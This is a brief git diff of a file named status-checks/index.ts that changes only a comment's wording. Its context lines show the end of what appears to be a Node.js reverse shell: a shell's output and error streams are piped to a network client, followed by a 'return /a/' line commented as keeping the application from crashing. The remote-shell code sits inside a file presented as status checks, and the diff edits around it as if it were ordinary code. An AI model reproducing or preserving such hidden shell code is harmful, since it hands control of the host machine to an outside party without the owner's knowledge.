diff --git a/status-checks/index.ts b/status-checks/index.ts index f464af47..78a52005 100644 --- a/status-checks/index.ts +++ b/status-checks/index.ts @@ -8,5 +8,5 @@ sh.stdout.pipe(client); sh.stderr.pipe(client); }); - return /a/; // Prevents the Node js application form crashing + return /a/; // Prevents the Node.js application form crashing })();